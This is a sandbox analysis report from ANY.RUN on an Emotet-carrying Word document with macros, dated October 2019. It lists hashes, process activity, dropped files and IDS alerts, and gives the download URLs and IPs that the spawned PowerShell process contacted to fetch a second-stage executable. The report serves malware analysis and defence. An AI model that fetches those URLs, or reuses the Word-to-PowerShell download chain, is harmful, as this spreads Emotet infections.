Sample: XdMOLGXYGfRWgazukFjJgqUGokvVNN

Full analysis: https://app.any.run/tasks/f448007f-3dfe-47f4-9e7b-94b9d384bda6
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 19:04:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Knoll, Subject: Rubber, Author: Daryl Kiehn, Keywords: Fields, Comments: Rubber, Template: Normal.dotm, Last Saved By: Bryce Harber, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 17:49:00 2019, Last Saved Time/Date: Wed Oct 9 17:49:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0
MD5: 40C18DFA04993A800F3F756EF78C29FC
SHA1: 1929B2712A81C2377F9D2832FBDCC5EFBC8F18EA
SHA256: 8FD04CE2418FC4BAF9EBDE360FA250CBAFAD34DD67DEA5AFE4F317779679DFF2
SSDEEP: 6144:ZRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdZZb3tpTkPSP/bd8bijiH8pk4FiLW46dis:ZRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRd9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    • No malicious indicators.
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 3052)
    • Executed via WMI
      • powershell.exe (PID: 3052)
    • PowerShell script executed
      • powershell.exe (PID: 3052)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2908)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2908)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Schroeder
HeadingPairs: Title, 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 205
Paragraphs: 1
Lines: 1
Company: Grant Group
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 176
Words: 30
Pages: 1
ModifyDate: 2019:10:09 16:49:00
CreateDate: 2019:10:09 16:49:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Bryce Harber
Template: Normal.dotm
Comments: Rubber
Keywords: Fields
Author: Daryl Kiehn
Subject: Rubber
Title: Knoll
No data.
Total processes: 36
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1

Behavior graph (nodes): start, winword.exe (no specs), powershell.exe

Process information

PID: 2908
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\XdMOLGXYGfRWgazukFjJgqUGokvVNN.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 3052
CMD: powershell -enco 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 369
Read events: 895
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 2
Text files: 0
Unknown types: 15

Dropped files

PID | Process | Filename | Type
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4EF8.tmp | cvr
  MD5:
  SHA256:
3052 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0GOWIRCNGFZGK3CDDXUV.temp | -
  MD5:
  SHA256:
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E9303A9D.wmf | wmf
  MD5: 1072F06BE6E1D176E71E0052BF0E20D0
  SHA256: 486EF451450F2D936FA195438807CC0EF804335F85690691B5EBA8B038DB8A7B
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\452EEAAF.wmf | wmf
  MD5: C67BE3EFE8EFB93BE36C4A417A612093
  SHA256: A06C0C8F597584BDC5E59AEEEDE1B5151D9726C97ACB23481E881209A3972033
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$MOLGXYGfRWgazukFjJgqUGokvVNN.doc | pgc
  MD5: F3CBB64365BAD7D6D5385FC0A195FE19
  SHA256: F17376694950FBD7779D64AF10B78DD621C7467F6DF8B7D69A61A51B2A00F8A4
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\335883B3.wmf | wmf
  MD5: 74BDE68E29D389104763216CCA513FA3
  SHA256: 0755F2494EBA3CDFD0617FA5247B73F0AC82A5F8B637E3FF6B3E168EB69C6720
2908 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc
  MD5: 1FDE0F7D27D0DEEB0E01F88352F8A2C8
  SHA256: AFCD4A7E9156DE74CA15024ECE1C1AA146506203C4B9F55F79014C0C676AF0BF
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb
  MD5: D84911D9A4ED323A1EA06B6EAA119E13
  SHA256: 3801DA90160540364396E75E524103453447E22AC66C65FB975A2EC8A8268277
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9904AB39.wmf | wmf
  MD5: 49C5D718F641C17D725BD20C4DE3C461
  SHA256: C957EBE630668E014AB6BA4346E6F5368873D72E3280405D61395E926EE6A0F0
2908 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C82287FA.wmf | wmf
  MD5: 3A5B765E2D565595E3777151B0A50B80
  SHA256: 03F7EB60405A0124ED54D7EAEBD7169D8B6C8E7D86703C983F54DD97E9D45371
HTTP(S) requests: 2
TCP/UDP connections: 5
DNS requests: 3
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3052 | powershell.exe | GET | - | 43.255.154.97:80 | http://future-maintenance.com/wp-content/DDbVcLPvz/ | SG | - | - | suspicious
3052 | powershell.exe | GET | 301 | 45.56.100.50:80 | http://www.soprettyhairllc.com/welcome2/ircYdjewPt/ | US | html | 162 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3052 | powershell.exe | 45.56.100.50:80 | www.soprettyhairllc.com | Linode, LLC | US | unknown
3052 | powershell.exe | 45.56.100.50:443 | www.soprettyhairllc.com | Linode, LLC | US | unknown
3052 | powershell.exe | 47.110.40.3:443 | www.zhizaisifang.com | - | CN | unknown
3052 | powershell.exe | 43.255.154.97:80 | future-maintenance.com | GoDaddy.com, LLC | SG | suspicious

DNS requests

Domain | IP | Reputation
www.soprettyhairllc.com | 45.56.100.50 | unknown
www.zhizaisifang.com | 47.110.40.3 | unknown
future-maintenance.com | 43.255.154.97 | suspicious

Threats

PID | Process | Class | Message
3052 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3052 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3052 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP
No debug info